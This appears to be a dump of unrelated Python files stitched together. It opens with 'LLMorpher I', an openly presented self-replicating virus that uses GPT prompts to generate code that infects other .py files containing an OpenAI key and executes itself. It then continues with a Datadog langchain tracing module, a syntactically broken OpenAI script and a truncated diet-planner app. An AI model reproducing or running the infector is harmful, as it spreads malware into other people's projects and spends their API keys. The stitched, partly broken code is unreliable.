tofile_str+='tofile_list.append("'+l+'")\n'
vic_code = comp_str_fct(tofile_list)
tofile_str = tofile_str + '\n' + vic_code
complete_str=comp_str_fct(prompts_list)
exec(complete_str)
| [
"[]"
] |
2024-01-10 | tmpout/tmpout.github.io | 3~llmorpher-spth~LLMorpherI.py | import openai
# LLMorpher I by Second Part To Hell
# A new-age AI-based self-replicator, powered by OpenAIs GPT. Fully encodes the self-replicator into natural language
#
# See my text for details: Using GPT to encode and mutate computer viruses entirely in natural language
#
# March 2023
# https://github.com/SPTHvx/SPTH
# [email protected]
# twitter: @SPTHvx
openai.api_key = "..." # Add your openai key here
prompts_list=[]
tofile_list=[]
prompts_list.append("Write a python function get_files which returns a list file_list with all .py files in the current directory. If you need to import some packages, do it.")
prompts_list.append("Write a python function get_content which takes an input argument (string of a text file), reads the text file and returns its full file content. Do not write anything else except of the python code!")
prompts_list.append("Write a python function is_key, which takes a string as an input and return True, if it contains the substring 'openai.api_key' (which has 14 characters) exactly once, otherwise False. Be careful, do not compare the entire string, but find how often the substring is contained! Very important: Do not write anything else except of the python code, do not write print statements and do not define variables outside of the function. Just write the function!")
prompts_list.append("Write a python function write_to_file which takes a filename and a string as an input, and append one line break (do not forget!) and the input string to the file. Output only the python code, nothing else!")
prompts_list.append("Write a loop over all elements returned by the function get_files (which has no arguments). For each element (lets call it curr_element), test whether the function is_key with the argument returned from get_content of the current element is True. If it is True, call the function write_to_file with curr_element as the first argument, and the variable tofile_str as the second argument. (tofile_str is a variable which is defined above)")
prompts_list.append("Write a python code (only this one line) which prints: 'LLMorphism I by SPTH - a new-age AI-based self-replicator, powered by OpenAIs GPT. Fully encodes the self-replicator into natural language.'.")
prompts_list.append("Write a python code (only this one line) which prints: 'Hugs to the valhalla gang - hh86, roy g biv, JPanic, herm1t!'.")
tofile_list.append("Write a python function return_text which takes two inputs: a prompt string, and the openai key (with a default value of the value openai.api_key). The function returns returns the output of an openai text completion (ONLY USE 3 parameters!). As parameters for the openai text completion use only four parameter (!!): engine which is 'text-davinci-003', max_tokens is 1000, temperature is 0.5, and the parameter prompt. Do not use any other parameters, only these four! The parameters are not strings!")
tofile_list.append("Write the following python function comp_str_fct, which has one argument. The argument is a list of strings. For each element of the list, call the function return_text (with the current element as the argument), and take its return value (a string). The function should combine all strings (with a line break) and return it.")
tofile_list.append("Write one line in python, which defines a string with the name tofile_str. The value of the string is 'prompts_list=[]', with a line break before and afterwards.")
tofile_list.append("Write one line in python, which appends and store to the string with the name tofile_str. The appended value is 'tofile_list=[]', followed by a line break.")
tofile_list.append("Write a short python code (no tests or examples). Make a loop over all elements in the list called prompts_list. Directly start with the loop, do not define any variables beforehand (you can assume that tofile_str is already defined). For each element, do the following three steps: 1) Add to the string tofile_str the string 'prompts_list.append('. 2) Add to the string tofile_str the current element of the loop with double quotation marks. 3) Add to the string tofile_str the string ')' and a line break.")
tofile_list.append("Write a short python code (no tests or examples). Make a loop over all elements in the list called tofile_list. Directly start with the loop, do not define any variables beforehand (you can assume that tofile_str is already defined). For each element, do the following three steps: 1) Add to the string tofile_str the string 'tofile_list.append('. 2) Add to the string tofile_str the current element of the loop with double quotation marks. 3) Add to the string tofile_str the string ')' and a line break.")
tofile_list.append("Write a python code (only this one line) which defines a variable vic_code. The variable is generated by a function call of comp_str_fct with the argument being the variable called tofile_list.")
tofile_list.append("Write a python code, which appends to the string variable tofile_str a line break, and then the variable vic_code (these are two variable names, not strings themselves!). Store the result in the variable tofile_str.")
tofile_list.append("Write a python code (only this one line) which defines a variable complete_str. The variable is generated by a function call of comp_str_fct with the argument being the variable called prompts_list.")
tofile_list.append("Write a python code (only this one line) which takes a multi line python code called complete_str, and runs it.")
def return_text(prompt, openai_key=openai.api_key):
response = openai.Completion.create(
engine="text-davinci-003",
max_tokens=1000,
temperature=0.5,
prompt=prompt,
api_key=openai_key
)
return response['choices'][0]['text']
def comp_str_fct(list_str):
combined_str = ""
for str in list_str:
combined_str += return_text(str) + "\n"
return combined_str
tofile_str = '\nprompts_list=[]\n'
tofile_str += 'tofile_list=[]\n'
for element in prompts_list:
tofile_str += 'prompts_list.append("' + element + '")\n'
for element in tofile_list:
tofile_str += 'tofile_list.append("' + element + '")\n'
vic_code = comp_str_fct(tofile_list)
tofile_str += '\n' + vic_code
complete_str = comp_str_fct(prompts_list)
exec(complete_str)
| [
"[]"
] |
2024-01-10 | goodspark/dd-trace-py | ddtrace~contrib~langchain~patch.py | import os
import sys
from typing import Any
from typing import Dict
from typing import Optional
from typing import TYPE_CHECKING
import langchain
from langchain.callbacks.openai_info import get_openai_token_cost_for_model
from ddtrace import config
from ddtrace.constants import ERROR_TYPE
from ddtrace.contrib._trace_utils_llm import BaseLLMIntegration
from ddtrace.contrib.langchain.constants import API_KEY
from ddtrace.contrib.langchain.constants import COMPLETION_TOKENS
from ddtrace.contrib.langchain.constants import MODEL
from ddtrace.contrib.langchain.constants import PROMPT_TOKENS
from ddtrace.contrib.langchain.constants import PROVIDER
from ddtrace.contrib.langchain.constants import TOTAL_COST
from ddtrace.contrib.langchain.constants import TYPE
from ddtrace.contrib.langchain.constants import text_embedding_models
from ddtrace.contrib.langchain.constants import vectorstores
from ddtrace.contrib.trace_utils import unwrap
from ddtrace.contrib.trace_utils import with_traced_module
from ddtrace.contrib.trace_utils import wrap
from ddtrace.internal.agent import get_stats_url
from ddtrace.internal.logger import get_logger
from ddtrace.internal.utils import get_argument_value
from ddtrace.internal.utils.formats import asbool
from ddtrace.pin import Pin
if TYPE_CHECKING:
from ddtrace import Span
log = get_logger(__name__)
config._add(
"langchain",
{
"logs_enabled": asbool(os.getenv("DD_LANGCHAIN_LOGS_ENABLED", False)),
"metrics_enabled": asbool(os.getenv("DD_LANGCHAIN_METRICS_ENABLED", True)),
"span_prompt_completion_sample_rate": float(os.getenv("DD_LANGCHAIN_SPAN_PROMPT_COMPLETION_SAMPLE_RATE", 1.0)),
"log_prompt_completion_sample_rate": float(os.getenv("DD_LANGCHAIN_LOG_PROMPT_COMPLETION_SAMPLE_RATE", 0.1)),
"span_char_limit": int(os.getenv("DD_LANGCHAIN_SPAN_CHAR_LIMIT", 128)),
"_api_key": os.getenv("DD_API_KEY"),
},
)
class _LangChainIntegration(BaseLLMIntegration):
_integration_name = "langchain"
def __init__(self, config, stats_url, site, api_key):
super().__init__(config, stats_url, site, api_key)
def _set_base_span_tags(self, span, interface_type="", provider=None, model=None, api_key=None):
# type: (Span, str, Optional[str], Optional[str], Optional[str]) -> None
"""Set base level tags that should be present on all LangChain spans (if they are not None)."""
span.set_tag_str(TYPE, interface_type)
if provider is not None:
span.set_tag_str(PROVIDER, provider)
if model is not None:
span.set_tag_str(MODEL, model)
if api_key is not None:
if len(api_key) >= 4:
span.set_tag_str(API_KEY, "...%s" % str(api_key[-4:]))
else:
span.set_tag_str(API_KEY, api_key)
@classmethod
def _logs_tags(cls, span):
# type: (Span) -> str
api_key = span.get_tag(API_KEY) or ""
tags = "env:%s,version:%s,%s:%s,%s:%s,%s:%s,%s:%s" % ( # noqa: E501
(config.env or ""),
(config.version or ""),
PROVIDER,
(span.get_tag(PROVIDER) or ""),
MODEL,
(span.get_tag(MODEL) or ""),
TYPE,
(span.get_tag(TYPE) or ""),
API_KEY,
api_key,
)
return tags
@classmethod
def _metrics_tags(cls, span):
# type: (Span) -> list
provider = span.get_tag(PROVIDER) or ""
api_key = span.get_tag(API_KEY) or ""
tags = [
"version:%s" % (config.version or ""),
"env:%s" % (config.env or ""),
"service:%s" % (span.service or ""),
"%s:%s" % (PROVIDER, provider),
"%s:%s" % (MODEL, span.get_tag(MODEL) or ""),
"%s:%s" % (TYPE, span.get_tag(TYPE) or ""),
"%s:%s" % (API_KEY, api_key),
"error:%d" % span.error,
]
err_type = span.get_tag(ERROR_TYPE)
if err_type:
tags.append("%s:%s" % (ERROR_TYPE, err_type))
return tags
def record_usage(self, span, usage):
# type: (Span, Dict[str, Any]) -> None
if not usage or self._config.metrics_enabled is False:
return
for token_type in ("prompt", "completion", "total"):
num_tokens = usage.get("token_usage", {}).get(token_type + "_tokens")
if not num_tokens:
continue
self.metric(span, "dist", "tokens.%s" % token_type, num_tokens)
total_cost = span.get_metric(TOTAL_COST)
if total_cost:
self.metric(span, "incr", "tokens.total_cost", total_cost)
def _extract_model_name(instance):
# type: (langchain.llm.BaseLLM) -> Optional[str]
"""Extract model name or ID from llm instance."""
for attr in ("model", "model_name", "model_id", "model_key", "repo_id"):
if hasattr(instance, attr):
return getattr(instance, attr)
return None
def _format_api_key(api_key):
# type: (str) -> str
"""Obfuscate a given LLM provider API key by returning the last four characters."""
if not api_key or len(api_key) < 4:
return ""
return "...%s" % api_key[-4:]
def _extract_api_key(instance):
# type: (Any) -> str
"""
Extract and format LLM-provider API key from instance.
Note that langchain's LLM/ChatModel/Embeddings interfaces do not have a
standard attribute name for storing the provider-specific API key, so make a
best effort here by checking for attributes that end with `api_key/api_token`.
"""
api_key_attrs = [a for a in dir(instance) if a.endswith(("api_token", "api_key"))]
if api_key_attrs and hasattr(instance, str(api_key_attrs[0])):
api_key = getattr(instance, api_key_attrs[0], None)
if api_key:
return _format_api_key(api_key)
return ""
def _tag_openai_token_usage(span, llm_output, propagated_cost=0, propagate=False):
# type: (Span, Dict[str, Any], int, bool) -> None
"""
Extract token usage from llm_output, tag on span.
Calculate the total cost for each LLM/chat_model, then propagate those values up the trace so that
the root span will store the total token_usage/cost of all of its descendants.
"""
for token_type in ("prompt", "completion", "total"):
current_metric_value = span.get_metric("langchain.tokens.%s_tokens" % token_type) or 0
metric_value = llm_output["token_usage"].get("%s_tokens" % token_type, 0)
span.set_metric("langchain.tokens.%s_tokens" % token_type, current_metric_value + metric_value)
total_cost = span.get_metric(TOTAL_COST) or 0
if not propagate:
try:
completion_cost = get_openai_token_cost_for_model(
span.get_tag(MODEL),
span.get_metric(COMPLETION_TOKENS),
is_completion=True,
)
prompt_cost = get_openai_token_cost_for_model(span.get_tag(MODEL), span.get_metric(PROMPT_TOKENS))
total_cost = completion_cost + prompt_cost
except ValueError:
# If not in langchain's openai model catalog, the above helpers will raise a ValueError.
log.debug("Cannot calculate token/cost as the model is not in LangChain's OpenAI model catalog.")
span.set_metric(TOTAL_COST, propagated_cost + total_cost)
if span._parent is not None:
_tag_openai_token_usage(span._parent, llm_output, propagated_cost=propagated_cost + total_cost, propagate=True)
@with_traced_module
def traced_llm_generate(langchain, pin, func, instance, args, kwargs):
llm_provider = instance._llm_type
prompts = get_argument_value(args, kwargs, 0, "prompts")
integration = langchain._datadog_integration
model = _extract_model_name(instance)
span = integration.trace(
pin,
"%s.%s" % (instance.__module__, instance.__class__.__name__),
interface_type="llm",
provider=llm_provider,
model=model,
api_key=_extract_api_key(instance),
)
completions = None
try:
if integration.is_pc_sampled_span(span):
for idx, prompt in enumerate(prompts):
span.set_tag_str("langchain.request.prompts.%d" % idx, integration.trunc(str(prompt)))
for param, val in getattr(instance, "_identifying_params", {}).items():
if isinstance(val, dict):
for k, v in val.items():
span.set_tag_str("langchain.request.%s.parameters.%s.%s" % (llm_provider, param, k), str(v))
else:
span.set_tag_str("langchain.request.%s.parameters.%s" % (llm_provider, param), str(val))
completions = func(*args, **kwargs)
if isinstance(instance, langchain.llms.OpenAI):
_tag_openai_token_usage(span, completions.llm_output)
integration.record_usage(span, completions.llm_output)
for idx, completion in enumerate(completions.generations):
if integration.is_pc_sampled_span(span):
span.set_tag_str("langchain.response.completions.%d.text" % idx, integration.trunc(completion[0].text))
if completion and completion[0].generation_info is not None:
span.set_tag_str(
"langchain.response.completions.%d.finish_reason" % idx,
str(completion[0].generation_info.get("finish_reason")),
)
span.set_tag_str(
"langchain.response.completions.%d.logprobs" % idx,
str(completion[0].generation_info.get("logprobs")),
)
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
if completions is None:
log_completions = []
else:
log_completions = [
[{"text": completion.text} for completion in completions] for completions in completions.generations
]
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={
"prompts": prompts,
"choices": log_completions,
},
)
return completions
@with_traced_module
async def traced_llm_agenerate(langchain, pin, func, instance, args, kwargs):
llm_provider = instance._llm_type
prompts = get_argument_value(args, kwargs, 0, "prompts")
integration = langchain._datadog_integration
model = _extract_model_name(instance)
span = integration.trace(
pin,
"%s.%s" % (instance.__module__, instance.__class__.__name__),
interface_type="llm",
provider=llm_provider,
model=model,
api_key=_extract_api_key(instance),
)
completions = None
try:
if integration.is_pc_sampled_span(span):
for idx, prompt in enumerate(prompts):
span.set_tag_str("langchain.request.prompts.%d" % idx, integration.trunc(str(prompt)))
for param, val in getattr(instance, "_identifying_params", {}).items():
if isinstance(val, dict):
for k, v in val.items():
span.set_tag_str("langchain.request.%s.parameters.%s.%s" % (llm_provider, param, k), str(v))
else:
span.set_tag_str("langchain.request.%s.parameters.%s" % (llm_provider, param), str(val))
completions = await func(*args, **kwargs)
if isinstance(instance, langchain.llms.OpenAI):
_tag_openai_token_usage(span, completions.llm_output)
integration.record_usage(span, completions.llm_output)
for idx, completion in enumerate(completions.generations):
if integration.is_pc_sampled_span(span):
span.set_tag_str("langchain.response.completions.%d.text" % idx, integration.trunc(completion[0].text))
if completion and completion[0].generation_info is not None:
span.set_tag_str(
"langchain.response.completions.%d.finish_reason" % idx,
str(completion[0].generation_info.get("finish_reason")),
)
span.set_tag_str(
"langchain.response.completions.%d.logprobs" % idx,
str(completion[0].generation_info.get("logprobs")),
)
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
if completions is None:
log_completions = []
else:
log_completions = [
[{"text": completion.text} for completion in completions] for completions in completions.generations
]
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={
"prompts": prompts,
"choices": log_completions,
},
)
return completions
@with_traced_module
def traced_chat_model_generate(langchain, pin, func, instance, args, kwargs):
llm_provider = instance._llm_type.split("-")[0]
chat_messages = get_argument_value(args, kwargs, 0, "chat_messages")
integration = langchain._datadog_integration
span = integration.trace(
pin,
"%s.%s" % (instance.__module__, instance.__class__.__name__),
interface_type="chat_model",
provider=llm_provider,
model=_extract_model_name(instance),
api_key=_extract_api_key(instance),
)
chat_completions = None
try:
for message_set_idx, message_set in enumerate(chat_messages):
for message_idx, message in enumerate(message_set):
if integration.is_pc_sampled_span(span):
span.set_tag_str(
"langchain.request.messages.%d.%d.content" % (message_set_idx, message_idx),
integration.trunc(message.content),
)
span.set_tag_str(
"langchain.request.messages.%d.%d.message_type" % (message_set_idx, message_idx),
message.__class__.__name__,
)
for param, val in getattr(instance, "_identifying_params", {}).items():
if isinstance(val, dict):
for k, v in val.items():
span.set_tag_str("langchain.request.%s.parameters.%s.%s" % (llm_provider, param, k), str(v))
else:
span.set_tag_str("langchain.request.%s.parameters.%s" % (llm_provider, param), str(val))
chat_completions = func(*args, **kwargs)
if isinstance(instance, langchain.chat_models.ChatOpenAI):
_tag_openai_token_usage(span, chat_completions.llm_output)
integration.record_usage(span, chat_completions.llm_output)
for message_set_idx, message_set in enumerate(chat_completions.generations):
for idx, chat_completion in enumerate(message_set):
if integration.is_pc_sampled_span(span):
span.set_tag_str(
"langchain.response.completions.%d.%d.content" % (message_set_idx, idx),
integration.trunc(chat_completion.text),
)
span.set_tag_str(
"langchain.response.completions.%d.%d.message_type" % (message_set_idx, idx),
chat_completion.message.__class__.__name__,
)
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
if chat_completions is None:
log_chat_completions = []
else:
log_chat_completions = [
[
{
"content": message.text,
"message_type": message.message.__class__.__name__,
}
for message in messages
]
for messages in chat_completions.generations
]
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={
"messages": [
[
{
"content": message.content,
"message_type": message.__class__.__name__,
}
for message in messages
]
for messages in chat_messages
],
"choices": log_chat_completions,
},
)
return chat_completions
@with_traced_module
async def traced_chat_model_agenerate(langchain, pin, func, instance, args, kwargs):
llm_provider = instance._llm_type.split("-")[0]
chat_messages = get_argument_value(args, kwargs, 0, "chat_messages")
integration = langchain._datadog_integration
span = integration.trace(
pin,
"%s.%s" % (instance.__module__, instance.__class__.__name__),
interface_type="chat_model",
provider=llm_provider,
model=_extract_model_name(instance),
api_key=_extract_api_key(instance),
)
chat_completions = None
try:
for message_set_idx, message_set in enumerate(chat_messages):
for message_idx, message in enumerate(message_set):
if integration.is_pc_sampled_span(span):
span.set_tag_str(
"langchain.request.messages.%d.%d.content" % (message_set_idx, message_idx),
integration.trunc(message.content),
)
span.set_tag_str(
"langchain.request.messages.%d.%d.message_type" % (message_set_idx, message_idx),
message.__class__.__name__,
)
for param, val in getattr(instance, "_identifying_params", {}).items():
if isinstance(val, dict):
for k, v in val.items():
span.set_tag_str("langchain.request.%s.parameters.%s.%s" % (llm_provider, param, k), str(v))
else:
span.set_tag_str("langchain.request.%s.parameters.%s" % (llm_provider, param), str(val))
chat_completions = await func(*args, **kwargs)
if isinstance(instance, langchain.chat_models.ChatOpenAI):
_tag_openai_token_usage(span, chat_completions.llm_output)
integration.record_usage(span, chat_completions.llm_output)
for message_set_idx, message_set in enumerate(chat_completions.generations):
for idx, chat_completion in enumerate(message_set):
if integration.is_pc_sampled_span(span):
span.set_tag_str(
"langchain.response.completions.%d.%d.content" % (message_set_idx, idx),
integration.trunc(chat_completion.text),
)
span.set_tag_str(
"langchain.response.completions.%d.%d.message_type" % (message_set_idx, idx),
chat_completion.message.__class__.__name__,
)
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
if chat_completions is None:
log_chat_completions = []
else:
log_chat_completions = [
[
{
"content": message.text,
"message_type": message.message.__class__.__name__,
}
for message in messages
]
for messages in chat_completions.generations
]
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={
"messages": [
[
{
"content": message.content,
"message_type": message.__class__.__name__,
}
for message in messages
]
for messages in chat_messages
],
"choices": log_chat_completions,
},
)
return chat_completions
@with_traced_module
def traced_embedding(langchain, pin, func, instance, args, kwargs):
input_texts = get_argument_value(args, kwargs, 0, "text")
provider = instance.__class__.__name__.split("Embeddings")[0].lower()
integration = langchain._datadog_integration
span = integration.trace(
pin,
"%s.%s" % (instance.__module__, instance.__class__.__name__),
interface_type="embedding",
provider=provider,
model=_extract_model_name(instance),
api_key=_extract_api_key(instance),
)
try:
if isinstance(input_texts, str):
if integration.is_pc_sampled_span(span):
span.set_tag_str("langchain.request.inputs.0.text", integration.trunc(input_texts))
span.set_metric("langchain.request.input_count", 1)
else:
if integration.is_pc_sampled_span(span):
for idx, text in enumerate(input_texts):
span.set_tag_str("langchain.request.inputs.%d.text" % idx, integration.trunc(text))
span.set_metric("langchain.request.input_count", len(input_texts))
# langchain currently does not support token tracking for OpenAI embeddings:
# https://github.com/hwchase17/langchain/issues/945
embeddings = func(*args, **kwargs)
if isinstance(embeddings, list) and isinstance(embeddings[0], list):
for idx, embedding in enumerate(embeddings):
span.set_metric("langchain.response.outputs.%d.embedding_length" % idx, len(embedding))
else:
span.set_metric("langchain.response.outputs.embedding_length", len(embeddings))
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={"inputs": [input_texts] if isinstance(input_texts, str) else input_texts},
)
return embeddings
@with_traced_module
def traced_chain_call(langchain, pin, func, instance, args, kwargs):
integration = langchain._datadog_integration
span = integration.trace(pin, "%s.%s" % (instance.__module__, instance.__class__.__name__), interface_type="chain")
final_outputs = {}
try:
inputs = args[0]
if not isinstance(inputs, dict):
inputs = {instance.input_keys[0]: inputs}
if integration.is_pc_sampled_span(span):
for k, v in inputs.items():
span.set_tag_str("langchain.request.inputs.%s" % k, integration.trunc(str(v)))
if hasattr(instance, "prompt"):
span.set_tag_str("langchain.request.prompt", integration.trunc(str(instance.prompt.template)))
final_outputs = func(*args, **kwargs)
if integration.is_pc_sampled_span(span):
for k, v in final_outputs.items():
span.set_tag_str("langchain.response.outputs.%s" % k, integration.trunc(str(v)))
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
log_inputs = {}
log_outputs = {}
for k, v in inputs.items():
log_inputs[k] = str(v)
for k, v in final_outputs.items():
log_outputs[k] = str(v)
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={
"inputs": log_inputs,
"prompt": str(instance.prompt.template) if hasattr(instance, "prompt") else "",
"outputs": log_outputs,
},
)
return final_outputs
@with_traced_module
async def traced_chain_acall(langchain, pin, func, instance, args, kwargs):
integration = langchain._datadog_integration
span = integration.trace(pin, "%s.%s" % (instance.__module__, instance.__class__.__name__), interface_type="chain")
final_outputs = {}
try:
inputs = args[0]
if not isinstance(inputs, dict):
inputs = {instance.input_keys[0]: inputs}
if integration.is_pc_sampled_span(span):
for k, v in inputs.items():
span.set_tag_str("langchain.request.inputs.%s" % k, integration.trunc(str(v)))
if hasattr(instance, "prompt"):
span.set_tag_str("langchain.request.prompt", integration.trunc(str(instance.prompt.template)))
final_outputs = await func(*args, **kwargs)
if integration.is_pc_sampled_span(span):
for k, v in final_outputs.items():
span.set_tag_str("langchain.response.outputs.%s" % k, integration.trunc(str(v)))
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
log_inputs = {}
log_outputs = {}
for k, v in inputs.items():
log_inputs[k] = str(v)
for k, v in final_outputs.items():
log_outputs[k] = str(v)
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={
"inputs": log_inputs,
"prompt": str(instance.prompt.template) if hasattr(instance, "prompt") else "",
"outputs": log_outputs,
},
)
return final_outputs
@with_traced_module
def traced_similarity_search(langchain, pin, func, instance, args, kwargs):
integration = langchain._datadog_integration
query = get_argument_value(args, kwargs, 0, "query")
k = kwargs.get("k", args[1] if len(args) >= 2 else None)
provider = instance.__class__.__name__.lower()
span = integration.trace(
pin,
"%s.%s" % (instance.__module__, instance.__class__.__name__),
interface_type="similarity_search",
provider=provider,
api_key=_extract_api_key(instance),
)
documents = []
try:
if integration.is_pc_sampled_span(span):
span.set_tag_str("langchain.request.query", integration.trunc(query))
if k is not None:
span.set_tag_str("langchain.request.k", str(k))
for kwarg_key, v in kwargs.items():
span.set_tag_str("langchain.request.%s" % kwarg_key, str(v))
if isinstance(instance, langchain.vectorstores.Pinecone):
span.set_tag_str(
"langchain.request.pinecone.environment",
instance._index.configuration.server_variables.get("environment", ""),
)
span.set_tag_str(
"langchain.request.pinecone.index_name",
instance._index.configuration.server_variables.get("index_name", ""),
)
span.set_tag_str(
"langchain.request.pinecone.project_name",
instance._index.configuration.server_variables.get("project_name", ""),
)
api_key = instance._index.configuration.api_key.get("ApiKeyAuth", "")
span.set_tag_str(API_KEY, "...%s" % api_key[-4:]) # override api_key for Pinecone
documents = func(*args, **kwargs)
span.set_metric("langchain.response.document_count", len(documents))
for idx, document in enumerate(documents):
span.set_tag_str(
"langchain.response.document.%d.page_content" % idx, integration.trunc(str(document.page_content))
)
for kwarg_key, v in document.metadata.items():
span.set_tag_str(
"langchain.response.document.%d.metadata.%s" % (idx, kwarg_key), integration.trunc(str(v))
)
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={
"query": query,
"k": k or "",
"documents": [
{"page_content": document.page_content, "metadata": document.metadata} for document in documents
],
},
)
return documents
def patch():
if getattr(langchain, "_datadog_patch", False):
return
setattr(langchain, "_datadog_patch", True)
# TODO: How do we test this? Can we mock out the metric/logger/sampler?
ddsite = os.getenv("DD_SITE", "datadoghq.com")
ddapikey = os.getenv("DD_API_KEY", config.langchain._api_key)
Pin().onto(langchain)
integration = _LangChainIntegration(
config=config.langchain,
stats_url=get_stats_url(),
site=ddsite,
api_key=ddapikey,
)
setattr(langchain, "_datadog_integration", integration)
if config.langchain.logs_enabled:
if not ddapikey:
raise ValueError(
"DD_API_KEY is required for sending logs from the LangChain integration."
" The LangChain integration can be disabled by setting the ``DD_TRACE_LANGCHAIN_ENABLED``"
" environment variable to False."
)
integration.start_log_writer()
# TODO: check if we need to version gate LLM/Chat/TextEmbedding
wrap("langchain", "llms.base.BaseLLM.generate", traced_llm_generate(langchain))
wrap("langchain", "llms.BaseLLM.agenerate", traced_llm_agenerate(langchain))
wrap("langchain", "chat_models.base.BaseChatModel.generate", traced_chat_model_generate(langchain))
wrap("langchain", "chat_models.base.BaseChatModel.agenerate", traced_chat_model_agenerate(langchain))
wrap("langchain", "chains.base.Chain.__call__", traced_chain_call(langchain))
wrap("langchain", "chains.base.Chain.acall", traced_chain_acall(langchain))
# Text embedding models override two abstract base methods instead of super calls, so we need to
# wrap each langchain-provided text embedding model.
for text_embedding_model in text_embedding_models:
if hasattr(langchain.embeddings, text_embedding_model):
wrap("langchain", "embeddings.%s.embed_query" % text_embedding_model, traced_embedding(langchain))
wrap("langchain", "embeddings.%s.embed_documents" % text_embedding_model, traced_embedding(langchain))
# TODO: langchain >= 0.0.209 includes async embedding implementation (only for OpenAI)
# We need to do the same with Vectorstores.
for vectorstore in vectorstores:
if hasattr(langchain.vectorstores, vectorstore):
wrap("langchain", "vectorstores.%s.similarity_search" % vectorstore, traced_similarity_search(langchain))
def unpatch():
if getattr(langchain, "_datadog_patch", False):
setattr(langchain, "_datadog_patch", False)
unwrap(langchain.llms.base.BaseLLM, "generate")
unwrap(langchain.llms.base.BaseLLM, "agenerate")
unwrap(langchain.chat_models.base.BaseChatModel, "generate")
unwrap(langchain.chat_models.base.BaseChatModel, "agenerate")
unwrap(langchain.chains.base.Chain, "__call__")
unwrap(langchain.chains.base.Chain, "acall")
for text_embedding_model in text_embedding_models:
if hasattr(langchain.embeddings, text_embedding_model):
unwrap(getattr(langchain.embeddings, text_embedding_model), "embed_query")
unwrap(getattr(langchain.embeddings, text_embedding_model), "embed_documents")
for vectorstore in vectorstores:
if hasattr(langchain.vectorstores, vectorstore):
unwrap(getattr(langchain.vectorstores, vectorstore), "similarity_search")
delattr(langchain, "_datadog_integration")
| [] |
2024-01-10 | Himabitoo/TalkWith-ChatGpt | TalkWith.py | import os
import openai
from dotenv import load_dotenv
class TalkWith:
def __init__(self):
# env load
load_dotenv()
#works
self._post_api()
def _post_api(self,msg):
# apiを渡す
openai.api_key = os.getenv('OPEN_API_KEY')
# レスポンスを取得
response = openai.Completion.create(
model="text-davinci-003",
prompt="Say this is a test",
message=[
"role":"user",
"content":"hello"
],
temperature=0,
max_tokens=20
)
print('response', response)
print(response["choices"][0]["message"]["content"])
if __name__ == '__main__':
TalkWith() | [
"Say this is a test"
] |
2024-01-10 | ma-rista/NutriScanPlanner | diet_planner~diet_planner.py | import gradio as gr
import openai
import deepl
from openai import OpenAI
# OpenAI 라이브러리에 API 키 설정
openai.api_key = ''
client = OpenAI(api_key='')
# DeepL API 인증 키 설정
auth_key = ""
translator = deepl.Translator(auth_key)
def translate_text_with_deepl(text, target_language="KO"):
try:
result = translator.translate_text(text, target_lang=target_language)
return result.text
except deepl.DeepLException as error:
print(error)
return text # 번역에 실패한 경우 원문 반환
def generate_diet_plan(calories, ingredients, cuisine, dietary_restrictions, allergies, medical_conditions, meals_per_day, cooking_preference):
# 채팅 형식의 메시지 생성
messages = [
{"role": "system", "content": "You are an assistant capable of creating personalized diet plans."},
{"role": "user", "content": f"Create a diet plan with the following requirements:\nCalories: {calories}\nIngredients: {ingredients}\nCuisine: {cuisine}\nDietary Restrictions: {dietary_restrictions}\nAllergies: {allergies}\nMedical Conditions: {medical_conditions}\nMeals per day: {meals_per_day}\nCooking Preference: {cooking_preference}"}
]
# GPT API 호출
completion = client.chat.completions.create(
model="gpt-3.5-turbo",
messages=messages
)
# 결과를 마크다운 형식으로 변환
diet_plan = completion.choices[0].message.content
translated_diet_plan = translate_text_with_deepl(diet_plan, "KO") # 한국어로 번역된 식단 계획
# markdown_format = f"### Generated Diet Plan\n\n{diet_plan}"
markdown_format = f"### 생성된 식단 계획 (Translated)\n\n{translated_diet_plan}"
return markdown_format
# Gradio 인터페이스 구성
with gr.Blocks() as demo:
with gr.Row():
with gr.Column():
# 인풋 구성
calories = gr.Number(label="TDEE 계산기로 입력받은 칼로리")
ingredients = gr.Textbox(label="식재료")
